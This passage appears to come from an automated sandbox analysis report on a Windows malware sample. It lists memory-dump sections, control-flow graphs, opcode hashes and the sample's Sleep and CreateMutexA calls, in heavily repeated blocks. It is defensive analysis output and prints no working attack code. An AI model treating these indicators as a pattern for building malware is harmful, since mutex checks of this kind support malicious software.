                                                                                                                • Associated: 00000005.00000002.2360222344.0000000001024000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360281028.0000000001052000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360305378.0000000001053000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360328056.0000000001058000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360350309.000000000105A000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360377199.0000000001067000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_d50000_8WYS1MQTL0QCOHKIPL8.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateMutexSleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 1464230837-0
                                                                                                                • Opcode ID: 56bba04bfbd69fe940af5621db554263632e25f22869e199f2159e74289c03da
                                                                                                                • Instruction ID: f0e4c7a75dc9ca2e59937f2806305dc94352f3bba5fabe2e897ad704110a95a2
                                                                                                                • Opcode Fuzzy Hash: 56bba04bfbd69fe940af5621db554263632e25f22869e199f2159e74289c03da
                                                                                                                • Instruction Fuzzy Hash: 7A312A31A042118BEF18DB7CDC85B6DB7A2EBC5315F248718EC549B3D1D77589848B32

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1119 d5a682-d5a6a2 1123 d5a6a4-d5a6b0 1119->1123 1124 d5a6d0-d5a6ec 1119->1124 1125 d5a6c6-d5a6cd call d6d663 1123->1125 1126 d5a6b2-d5a6c0 1123->1126 1127 d5a6ee-d5a6fa 1124->1127 1128 d5a71a-d5a739 1124->1128 1125->1124 1126->1125 1131 d5a949 1126->1131 1133 d5a710-d5a717 call d6d663 1127->1133 1134 d5a6fc-d5a70a 1127->1134 1129 d5a767-d5a916 call d680c0 1128->1129 1130 d5a73b-d5a747 1128->1130 1135 d5a75d-d5a764 call d6d663 1130->1135 1136 d5a749-d5a757 1130->1136 1139 d5a94e-d5a994 call d86c6a Sleep CreateMutexA 1131->1139 1140 d5a949 call d86c6a 1131->1140 1133->1128 1134->1131 1134->1133 1135->1129 1136->1131 1136->1135 1151 d5a9a7-d5a9a8 1139->1151 1152 d5a996-d5a998 1139->1152 1140->1139 1152->1151 1153 d5a99a-d5a9a5 1152->1153 1153->1151
                                                                                                                APIs
                                                                                                                • Sleep.KERNEL32(00000064), ref: 00D5A963
                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00DB3254), ref: 00D5A981
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp, Offset: 00D50000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2359222309.0000000000D50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359244276.0000000000DB2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359322317.0000000000DB9000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359347443.0000000000DBB000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359376160.0000000000DC7000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359492979.0000000000F2D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359515161.0000000000F2F000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359545297.0000000000F3F000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359545297.0000000000F4C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359601670.0000000000F5F000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359631487.0000000000F61000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359657696.0000000000F62000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359683868.0000000000F66000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359711488.0000000000F77000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359736163.0000000000F78000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359760761.0000000000F7B000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359785127.0000000000F7C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359811048.0000000000F86000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359836047.0000000000F91000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359865432.0000000000FAC000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359896308.0000000000FB3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359917473.0000000000FB4000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359949602.0000000000FB8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359978106.0000000000FBF000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360004160.0000000000FC0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360030574.0000000000FCB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360058543.0000000000FCE000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360083218.0000000000FD6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360108877.0000000000FDE000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360139906.0000000000FE5000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360166313.0000000000FE7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360196166.0000000001004000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360222344.0000000001005000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360222344.0000000001024000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360281028.0000000001052000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360305378.0000000001053000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360328056.0000000001058000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360350309.000000000105A000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360377199.0000000001067000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_d50000_8WYS1MQTL0QCOHKIPL8.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateMutexSleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 1464230837-0
                                                                                                                • Opcode ID: b2ba0c6c5455fe16bce9c83f6c58275db49493cb8a05abcc1edf686cd6902526
                                                                                                                • Instruction ID: 7771c608fcaefbd3e92eacd902340688dadc7b529c268f8138610f48861f6c80
                                                                                                                • Opcode Fuzzy Hash: b2ba0c6c5455fe16bce9c83f6c58275db49493cb8a05abcc1edf686cd6902526
                                                                                                                • Instruction Fuzzy Hash: 75311631A142159BEF18DB7CDC89B6DB7A2EB85321F248718EC149B3D1C77589888B72

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1155 d59adc-d59ae8 1156 d59afe-d59b27 call d6d663 1155->1156 1157 d59aea-d59af8 1155->1157 1164 d59b55-d59b57 1156->1164 1165 d59b29-d59b35 1156->1165 1157->1156 1158 d5a917 1157->1158 1161 d5a953-d5a994 Sleep CreateMutexA 1158->1161 1162 d5a917 call d86c6a 1158->1162 1169 d5a9a7-d5a9a8 1161->1169 1170 d5a996-d5a998 1161->1170 1162->1161 1171 d59b65-d59d91 call d67a00 call d55c10 call d58b30 call d68220 call d67a00 call d55c10 call d58b30 call d68220 1164->1171 1172 d59b59-d5a916 call d680c0 1164->1172 1167 d59b37-d59b45 1165->1167 1168 d59b4b-d59b52 call d6d663 1165->1168 1167->1158 1167->1168 1168->1164 1170->1169 1175 d5a99a-d5a9a5 1170->1175 1175->1169
                                                                                                                APIs
                                                                                                                • Sleep.KERNEL32(00000064), ref: 00D5A963
                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00DB3254), ref: 00D5A981
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp, Offset: 00D50000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2359222309.0000000000D50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359244276.0000000000DB2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359322317.0000000000DB9000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359347443.0000000000DBB000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359376160.0000000000DC7000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359492979.0000000000F2D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359515161.0000000000F2F000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359545297.0000000000F3F000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359545297.0000000000F4C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359601670.0000000000F5F000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359631487.0000000000F61000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359657696.0000000000F62000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359683868.0000000000F66000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359711488.0000000000F77000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359736163.0000000000F78000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359760761.0000000000F7B000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359785127.0000000000F7C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359811048.0000000000F86000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359836047.0000000000F91000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359865432.0000000000FAC000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359896308.0000000000FB3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359917473.0000000000FB4000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359949602.0000000000FB8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359978106.0000000000FBF000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360004160.0000000000FC0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360030574.0000000000FCB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360058543.0000000000FCE000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360083218.0000000000FD6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360108877.0000000000FDE000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360139906.0000000000FE5000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360166313.0000000000FE7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360196166.0000000001004000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360222344.0000000001005000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360222344.0000000001024000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360281028.0000000001052000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360305378.0000000001053000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360328056.0000000001058000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360350309.000000000105A000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360377199.0000000001067000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_d50000_8WYS1MQTL0QCOHKIPL8.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateMutexSleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 1464230837-0
                                                                                                                • Opcode ID: 1410f6a22f0fc8b839f8b86e0d452005f3a22cc46e8fd91767df415a0009d38e
                                                                                                                • Instruction ID: 58b11c9ca5e0738e36bdde5c10a18fb8ade44cc66671f494525766dd02e409b3
                                                                                                                • Opcode Fuzzy Hash: 1410f6a22f0fc8b839f8b86e0d452005f3a22cc46e8fd91767df415a0009d38e
                                                                                                                • Instruction Fuzzy Hash: 1D210331654311DBEF189B6CEC85B6CF762EBC1311F244319EC188B2D5D7B599848A32

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1232 d5a856-d5a86e 1233 d5a870-d5a87c 1232->1233 1234 d5a89c-d5a89e 1232->1234 1237 d5a892-d5a899 call d6d663 1233->1237 1238 d5a87e-d5a88c 1233->1238 1235 d5a8a0-d5a8a7 1234->1235 1236 d5a8a9-d5a8b1 call d57d30 1234->1236 1239 d5a8eb-d5a916 call d680c0 1235->1239 1248 d5a8e4-d5a8e6 1236->1248 1249 d5a8b3-d5a8bb call d57d30 1236->1249 1237->1234 1238->1237 1241 d5a94e-d5a987 call d86c6a Sleep CreateMutexA 1238->1241 1253 d5a98e-d5a994 1241->1253 1248->1239 1249->1248 1254 d5a8bd-d5a8c5 call d57d30 1249->1254 1255 d5a9a7-d5a9a8 1253->1255 1256 d5a996-d5a998 1253->1256 1254->1248 1260 d5a8c7-d5a8cf call d57d30 1254->1260 1256->1255 1258 d5a99a-d5a9a5 1256->1258 1258->1255 1260->1248 1264 d5a8d1-d5a8d9 call d57d30 1260->1264 1264->1248 1267 d5a8db-d5a8e2 1264->1267 1267->1239
                                                                                                                APIs
                                                                                                                • Sleep.KERNEL32(00000064), ref: 00D5A963
                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00DB3254), ref: 00D5A981
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp, Offset: 00D50000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2359222309.0000000000D50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359244276.0000000000DB2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359322317.0000000000DB9000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359347443.0000000000DBB000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359376160.0000000000DC7000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359492979.0000000000F2D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359515161.0000000000F2F000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359545297.0000000000F3F000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359545297.0000000000F4C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359601670.0000000000F5F000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359631487.0000000000F61000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359657696.0000000000F62000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359683868.0000000000F66000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359711488.0000000000F77000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359736163.0000000000F78000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359760761.0000000000F7B000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359785127.0000000000F7C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359811048.0000000000F86000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359836047.0000000000F91000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359865432.0000000000FAC000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359896308.0000000000FB3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359917473.0000000000FB4000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359949602.0000000000FB8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359978106.0000000000FBF000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360004160.0000000000FC0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360030574.0000000000FCB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360058543.0000000000FCE000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360083218.0000000000FD6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360108877.0000000000FDE000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360139906.0000000000FE5000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360166313.0000000000FE7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360196166.0000000001004000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360222344.0000000001005000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360222344.0000000001024000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360281028.0000000001052000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360305378.0000000001053000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360328056.0000000001058000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360350309.000000000105A000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360377199.0000000001067000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_d50000_8WYS1MQTL0QCOHKIPL8.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateMutexSleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 1464230837-0
                                                                                                                • Opcode ID: 2d9a6d00e9b1c7088f91aa2f2ad8bfd07d3ae8c5acd06e904c92360269c98f83
                                                                                                                • Instruction ID: ece7f991bf0432f4c600ad70a4c751d730620385ae56a8222e546f5ae2d077a8
                                                                                                                • Opcode Fuzzy Hash: 2d9a6d00e9b1c7088f91aa2f2ad8bfd07d3ae8c5acd06e904c92360269c98f83
                                                                                                                • Instruction Fuzzy Hash: C9216D31248311CBEF28A76C989676DBB62DF81302F284A16ED44D63C1CB76898D9673

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1209 d5a34f-d5a35b 1210 d5a371-d5a39a call d6d663 1209->1210 1211 d5a35d-d5a36b 1209->1211 1217 d5a39c-d5a3a8 1210->1217 1218 d5a3c8-d5a916 call d680c0 1210->1218 1211->1210 1212 d5a93a 1211->1212 1214 d5a953-d5a994 Sleep CreateMutexA 1212->1214 1215 d5a93a call d86c6a 1212->1215 1224 d5a9a7-d5a9a8 1214->1224 1225 d5a996-d5a998 1214->1225 1215->1214 1221 d5a3be-d5a3c5 call d6d663 1217->1221 1222 d5a3aa-d5a3b8 1217->1222 1221->1218 1222->1212 1222->1221 1225->1224 1229 d5a99a-d5a9a5 1225->1229 1229->1224
                                                                                                                APIs
                                                                                                                • Sleep.KERNEL32(00000064), ref: 00D5A963
                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00DB3254), ref: 00D5A981
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp, Offset: 00D50000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2359222309.0000000000D50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359244276.0000000000DB2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359322317.0000000000DB9000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359347443.0000000000DBB000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359376160.0000000000DC7000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359492979.0000000000F2D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359515161.0000000000F2F000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359545297.0000000000F3F000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359545297.0000000000F4C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359601670.0000000000F5F000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359631487.0000000000F61000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359657696.0000000000F62000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359683868.0000000000F66000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359711488.0000000000F77000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359736163.0000000000F78000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359760761.0000000000F7B000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359785127.0000000000F7C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359811048.0000000000F86000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359836047.0000000000F91000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359865432.0000000000FAC000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359896308.0000000000FB3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359917473.0000000000FB4000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359949602.0000000000FB8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2359978106.0000000000FBF000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360004160.0000000000FC0000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360030574.0000000000FCB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360058543.0000000000FCE000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360083218.0000000000FD6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360108877.0000000000FDE000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360139906.0000000000FE5000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360166313.0000000000FE7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360196166.0000000001004000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360222344.0000000001005000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360222344.0000000001024000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360281028.0000000001052000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360305378.0000000001053000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360328056.0000000001058000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360350309.000000000105A000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2360377199.0000000001067000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_d50000_8WYS1MQTL0QCOHKIPL8.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateMutexSleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 1464230837-0
                                                                                                                • Opcode ID: 0e92161d945cae9c50cf9acf3aaf4492bcca30643e065f6532201efd7d23af9f
                                                                                                                • Instruction ID: beda91e489e10dc1b13fd887f000816a3f52efef979f78da629de501e612cb69
                                                                                                                • Opcode Fuzzy Hash: 0e92161d945cae9c50cf9acf3aaf4492bcca30643e065f6532201efd7d23af9f
                                                                                                                • Instruction Fuzzy Hash: 1E2145316443109BEF189BACEC8576CBBA2DBC2316F244319EC049B7D0C77699888B72

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
